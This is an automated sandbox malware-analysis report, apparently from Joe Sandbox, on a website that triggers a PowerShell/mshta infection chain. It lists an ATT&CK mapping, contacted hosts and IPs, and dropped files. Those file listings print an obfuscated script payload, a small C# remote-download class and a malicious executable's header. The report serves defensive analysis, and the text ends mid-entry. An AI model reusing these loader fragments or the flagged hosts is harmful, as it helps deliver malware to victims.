      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Drive-by Compromise      		2
      Command and Scripting Interpreter      		1
      Browser Extensions      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote Services1
      Email Collection      		1
      Web Service      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts3
      PowerShell      		1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		1
      Disable or Modify Tools      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials23
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      http://annavirgili.com0%Avira URL Cloudsafe

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://annavirgili.com/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      star-mini.c10r.facebook.com
      		157.240.196.35
      		truefalse
        		high
        mc.yandex.ru
        		87.250.250.119
        		truefalse
          		high
          vc-live-cf.hotjar.io
          		3.164.182.78
          		truefalse
            		high
            pacman-content-live.live.eks.hotjar.com
            		52.49.166.168
            		truefalse
              		high
              nopaste.net
              		174.138.125.138
              		truefalse
                		unknown
                klipcatepiu0.shop
                		104.21.26.127
                		truefalse
                  		unknown
                  pastebin.com
                  		172.67.19.24
                  		truefalse
                    		high
                    annavirgili.com
                    		147.135.166.53
                    		truefalse
                      		high
                      scontent.xx.fbcdn.net
                      		157.240.196.15
                      		truefalse
                        		high
                        script.hotjar.com
                        		3.164.85.124
                        		truefalse
                          		high
                          a37dd8b3f3000a75e.awsglobalaccelerator.com
                          		3.33.155.121
                          		truefalse
                            		unknown
                            rebekkaworm.snuggleam.org
                            		172.67.205.226
                            		truefalse
                              		unknown
                              klipxevojie.shop
                              		104.21.68.188
                              		truefalse
                                		unknown
                                www.google.com
                                		172.217.19.228
                                		truefalse
                                  		high
                                  yxyz.zyxy.org
                                  		104.21.25.207
                                  		truetrue
                                    		unknown
                                    s.w.org
                                    		192.0.77.48
                                    		truefalse
                                      		high
                                      wsky-live.live.eks.hotjar.com
                                      		54.220.38.244
                                      		truefalse
                                        		high
                                        jonagye.shop
                                        		172.67.189.78
                                        		truefalse
                                          		unknown
                                          static-cdn.hotjar.com
                                          		18.161.111.91
                                          		truefalse
                                            		high
                                            data-seed-prebsc-1-s1.bnbchain.org
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              ntp.msn.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                use.fontawesome.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  vc.hotjar.io
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    static.hotjar.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      _8545._https.data-seed-prebsc-1-s1.bnbchain.org
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        ws.hotjar.com
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          www.facebook.com
                                                          		unknown
                                                          		unknownfalse
                                                            		high
                                                            windows.msn.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              mc.yandex.com
                                                              		unknown
                                                              		unknownfalse
                                                                		high
                                                                connect.facebook.net
                                                                		unknown
                                                                		unknownfalse
                                                                  		high
                                                                  content.hotjar.io
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    silversky.club
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		high

                                                                      Contacted URLs

                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      http://annavirgili.com/false
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://annavirgili.com/false
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        147.135.166.53
                                                                        		annavirgili.comFrance
                                                                        		16276OVHFRfalse
                                                                        172.217.19.228
                                                                        		www.google.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        172.67.142.245
                                                                        		unknownUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        108.128.190.134
                                                                        		unknownUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        87.250.250.119
                                                                        		mc.yandex.ruRussian Federation
                                                                        		13238YANDEXRUfalse
                                                                        174.138.125.138
                                                                        		nopaste.netUnited States
                                                                        		14061DIGITALOCEAN-ASNUSfalse
                                                                        23.218.208.109
                                                                        		unknownUnited States
                                                                        		6453AS6453USfalse
                                                                        192.0.77.48
                                                                        		s.w.orgUnited States
                                                                        		2635AUTOMATTICUSfalse
                                                                        93.158.134.119
                                                                        		unknownRussian Federation
                                                                        		13238YANDEXRUfalse
                                                                        104.21.25.207
                                                                        		yxyz.zyxy.orgUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        172.217.19.170
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        3.33.155.121
                                                                        		a37dd8b3f3000a75e.awsglobalaccelerator.comUnited States
                                                                        		8987AMAZONEXPANSIONGBfalse
                                                                        172.67.205.226
                                                                        		rebekkaworm.snuggleam.orgUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        3.164.85.124
                                                                        		script.hotjar.comUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        142.250.181.46
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        142.250.181.67
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        54.220.38.244
                                                                        		wsky-live.live.eks.hotjar.comUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        18.161.111.91
                                                                        		static-cdn.hotjar.comUnited States
                                                                        		3MIT-GATEWAYSUSfalse
                                                                        142.250.181.42
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        3.164.182.78
                                                                        		vc-live-cf.hotjar.ioUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        172.217.19.238
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        172.217.17.78
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        172.217.17.35
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        18.161.111.18
                                                                        		unknownUnited States
                                                                        		3MIT-GATEWAYSUSfalse
                                                                        216.58.208.232
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        142.250.181.100
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        52.49.166.168
                                                                        		pacman-content-live.live.eks.hotjar.comUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        142.250.181.104
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        239.255.255.250
                                                                        		unknownReserved
                                                                        		unknownunknownfalse
                                                                        77.88.21.119
                                                                        		unknownRussian Federation
                                                                        		13238YANDEXRUfalse
                                                                        157.240.196.15
                                                                        		scontent.xx.fbcdn.netUnited States
                                                                        		32934FACEBOOKUSfalse
                                                                        142.250.181.99
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        157.240.196.35
                                                                        		star-mini.c10r.facebook.comUnited States
                                                                        		32934FACEBOOKUSfalse
                                                                        64.233.163.84
                                                                        		unknownUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        204.79.197.203
                                                                        		unknownUnited States
                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                        Private

                                                                        IP
                                                                        192.168.2.16
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1573672
                                                                        Start date and time:2024-12-12 13:26:53 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                        Sample URL:http://annavirgili.com
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:24
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • EGA enabled
                                                                        Analysis Mode:stream
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal84.phis.troj.expl.evad.win@32/180@69/254

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.32.238.192, 142.250.181.67, 172.217.17.78, 64.233.163.84, 172.217.17.46, 142.250.181.104, 172.217.19.170
                                                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, www.googletagmanager.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • VT rate limit hit for: http://annavirgili.com

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.8169071768267574
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B3EE37A48CE90A8BD63F02CCCD9D71F3
                                                                        SHA1:CDF035B30875C46BAE56A9B0E626B844917E2357
                                                                        SHA-256:EB2A6EF2AF8B1CB7D9A9E12CD676671F474BA782EA6D2360E30645C3B5588E27
                                                                        SHA-512:0E03B82CA49778360CDD77B314115E47B7C35AF5078D4DBFDEB7561C76C3F435F6960C09B7047D2E756A9553C6A72E21C8E2FEECAE3892E38BB22B3BB2B2A60A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.08119385458380239
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FAB0AAAA7988BFAC64E7137443E591F6
                                                                        SHA1:E9A183F73C147EDD9BBE186E2D07C4816971D21B
                                                                        SHA-256:A4F8D2CBAEDAF7C585D0420619A473E281079AB98A5B5E282918E752227F801C
                                                                        SHA-512:4155FB4DE15260C0A57FAB830F7078382DD2E5CF23B1F2E302B366D8CB829FA4F67D70BF83663B1F40D08CDE732DA39F0BC2F7E15F50D23B44A28FCEE27DC1B8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...P.....................................;...{.......|Y.. ...{........... ...{... ...{..#.#.. ...{.|.................:.......|Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\MARBI[1].mp4

                                                                        Download File
                                                                        Process:C:\Windows\System32\mshta.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):337269
                                                                        Entropy (8bit):3.207443147907145
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E2FE6D222C33579954D5B13FBFB38F8F
                                                                        SHA1:F744370A7EE2CA2AF1C1942F256DB908543638FF
                                                                        SHA-256:74F22344728037B80B1B49340E3BCD3ABD5A9ABC89A36169ED59D9C674DA49F2
                                                                        SHA-512:B291DA3C90350062DF4405A1990F6B63155B2AD739F8849D4DB4BF5E4B40D38CEC21560736542616921FD3270DDFD9EC1E485273E196B334C204EE30775A8460
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:66j75f6er63I74H69z6fS6eG20j50R49f73w42S51K28c45s59S53L43f29f7bo76a61J72w20p56k42p4ci6aP41O4ab3dE20x27p27m3bV66U6fa72t20J28T76A61O72D20x6de48m79N55p64K61i20V3dJ20X30n3bI6dW48u79S55X64K61k20q3cV20p45b59y53d43X2eH6cY65r6eS67W74L68n3bM20G6dy48L79x55b64s61F2bf2bG29u7ba76B61e72z20Z41H68W6fz44j62J20s3dO20V53g74J72p69i6el67q2eD66m72L6fz6dv43P68v61H72Z43i6fs64l65p28i45g59Y53b43t5bH6dy48j79v55W64c61e5dU20r2dd20e37o32m31J29U3bp56C42I4cO6aC41j4aj20d3dA20x56R42q4cY6aC41f4ao20I2bh20w41a68n6fG44H62Q7di72U65b74Y75S72c6ek20v56i42R4cA6ag41Y4aJ7dY3bJ76Y61U72j20y56F42m4cG6aR41M4ao20W3dG20q50i49g73i42u51r28g5bi38I33L33L2cX38M33V32H2cH38B34z30P2cz38J32m32C2cS38X33J35L2cw38O33J36L2ce38F32d35F2cz38k32S32l2ch38c32q39B2cM38J32L39m2cj37e36z37P2cN38Y32X32x2cD38g34O31L2cl38g32k32T2cy37z35h33S2ci37Q36I36W2cj38N34i30W2cT37k35q33I2cL37W37b30R2cP37t35y33F2ci37g36B36T2cV38H32z32A2cs38W33D33M2cc37t35D33S2cW38c30g36z2cp38B33e31T2cq38F33A35P2cF38S32E32E2cB38b33k36B2cO38o33B37c2cO38i33d35w2ch38d32g36R2cS38I32v30m2cN38z33P3

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.890472898059848
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16784
                                                                        Entropy (8bit):5.584532313228575
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A992784DFEED80348A7339B6402B952B
                                                                        SHA1:A9BD875992173B546825123AA193553514D21226
                                                                        SHA-256:4330172006FDDC25FADE346D42839973B7312DBFE11D7922833360982CCF37FA
                                                                        SHA-512:9616F1AB4164A43906D750B1668403B43AB708D46D82C1966B7298BC3F553AC14EEBBAD646F066D3CDAFF5F6C3188E394FB572B411C8366FEC76BA95CFF1B679
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:@...e.......................t.i.................................H...............o..b~.D.poM...$..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                        C:\Users\user\AppData\Local\Temp\CSC2CD5A3AC9BED45FD9C1F4AD4196788AE.TMP

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:MSVC .res
                                                                        Category:dropped
                                                                        Size (bytes):652
                                                                        Entropy (8bit):3.1299056709434643
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7FDBE70DB5AC5A037B972DF9954D4384
                                                                        SHA1:EF134F53A38F0B7CD99F7DBD30E58FCF5BFC7CDB
                                                                        SHA-256:01DE9D8758CAFF0777EDEF1E9D29366CC2111543C54D4A237B2E35E7D91B9E01
                                                                        SHA-512:E9440351E0D90AFFCC3DA27490A3A826F3AA53ADE04E2C819FC9D03B496AFE05258F18A6270BBC2B4BF1E502B20BB25FC18008F32ADEA9F51576693222AEFF15
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.w.z.w.a.2.h.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.w.z.w.a.2.h.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                        C:\Users\user\AppData\Local\Temp\RESBF57.tmp

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Thu Dec 12 13:38:18 2024, 1st section name ".debug$S"
                                                                        Category:dropped
                                                                        Size (bytes):1340
                                                                        Entropy (8bit):4.032114405628789
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:95620E930EC9E7FC5BB06479552B678E
                                                                        SHA1:BE359EF7010E8108D3A2EAC8757BA02E678F5A74
                                                                        SHA-256:5CDA9731E2F7F105FFC0DC7B9299025A9711D4F52B4346EED19A9807D449C245
                                                                        SHA-512:AA2E752889168E1BA46215DDA48AB3C37659B6781EF8FB7D73EBA724F2B40C051102FC71BCB9BA7E2B01C1A381A6C4A3FFB27F1866ED25BDEDFB85B80BE0F103
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L...J.Zg.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........J....c:\Users\user\AppData\Local\Temp\CSC2CD5A3AC9BED45FD9C1F4AD4196788AE.TMP.......................Z.{.-..MC...........3.......C:\Users\user\AppData\Local\Temp\RESBF57.tmp.-.<....................a..Microsoft (R) CVTRES.r.=..cwd.C:\Windows\system32\WindowsPowerShell\v1.0.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.w.z.w.a.2.h.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                        C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):1767936
                                                                        Entropy (8bit):6.951436437535195
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3A19C125224A2DB2843B2A22BFA6705F
                                                                        SHA1:F99A5999528680E4176EF259568F610C98FCB5A6
                                                                        SHA-256:F0CFF23050C6D669D0456A52F26AFB59CBFB122397174AA2393D24787C743E07
                                                                        SHA-512:007AB313DBFB2BA68C58B1DE732952010AF84D7C816097FAD65E1B4DB8BB0B22E7CB8A7685D2F8E315A069A1F6231D63ABA7681AB641196B340E430ADE738F83
                                                                        Malicious:true
                                                                        Reputation:unknown
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....).<...............&..........................@.................................l4....@... ..................................)......`.......................................................................... ...T............................text...............................`..`.data...............................@....rdata....... ......................@..@.eh_fram............................@..@.bss.....................................idata...).......*...v..............@....CRT....8...........................@....tls................................@....rsrc...`...........................@..@.reloc..............h..............@..B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qwzwa2hv.0.cs

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):129
                                                                        Entropy (8bit):4.965788690918325
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8C50A926E37FE5154851BFFE45F2097C
                                                                        SHA1:60D121B96BF280179C2E62079D4F97EDBE3CC6E8
                                                                        SHA-256:0F97FB16C4F9F6856E6D4AE816EF0076EF96A6F68394E32F1B7B0FCFF24ED283
                                                                        SHA-512:BCDC7ECDFBEB89905EF9D08D74DDCFBFC9C5B5966FB649965A5CF28EC5798C5BBF65CC0A8DC088858F8A213E8655195DBFC26714C7AE712A35BE72DE7DF46C0D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.public class gMWIpEHNVi{public static string DvgyiJxuTt(string url){return (new System.Net.WebClient()).DownloadString(url);}}

                                                                        C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):349
                                                                        Entropy (8bit):5.286936731161316
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ABF315922A22B1DF0D97BB0B8DC3905D
                                                                        SHA1:5FC8C4C1BBD1D2E3060B83CC4F273263EEE53603
                                                                        SHA-256:B65314ECFECC43BB7047E3F581C16E8A09C64F0E0C533899E35F4D028BABCF01
                                                                        SHA-512:C0D7F6D19C6B5B8AD2A9D01D119A5D9C3A83A1D3EE2799735E40E707A25FCBC444E76687409627F48FFE7CCFDC98758CFDFC01A0CE44C5F499FBACA32FAD1B17
                                                                        Malicious:true
                                                                        Reputation:unknown
                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qwzwa2hv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qwzwa2hv.0.cs"

                                                                        C:\Users\user\AppData\Local\Temp\qwzwa2hv.dll

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3072
                                                                        Entropy (8bit):2.66258211518219
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:61A88DF55F6409433025A319D874E5B1
                                                                        SHA1:5EB6AEBDFAE1362DF78DA157BD7A1AFDDA59B48E
                                                                        SHA-256:5628B46334E32DC2D2EC8F4E7014F5C58AF2F782710DC8A5DF1195E174C80216
                                                                        SHA-512:AD5C6BF652E4A917F88CAD50AAAFCBD156A7E7C512FCD47C1B11C564C3B6FACE37EFB48A5188A66B471139472CB265FD3259FBECC65939E320D24E072B465A0A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.Zg...........!................n#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P#......H.......h ..............................................................2s.....(....*..(....*...BSJB............v4.0.30319......l.......#~..t.......#Strings....P.......#US.X.......#GUID...h...H...#Blob...........G.........%3....................................................2.+...n.N.....N...................................P ......9.....] ......D.........J...D.....D...!.D...!.......D.............&....................................."...................+..........<Module>.qw

                                                                        C:\Users\user\AppData\Local\Temp\qwzwa2hv.out

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):869
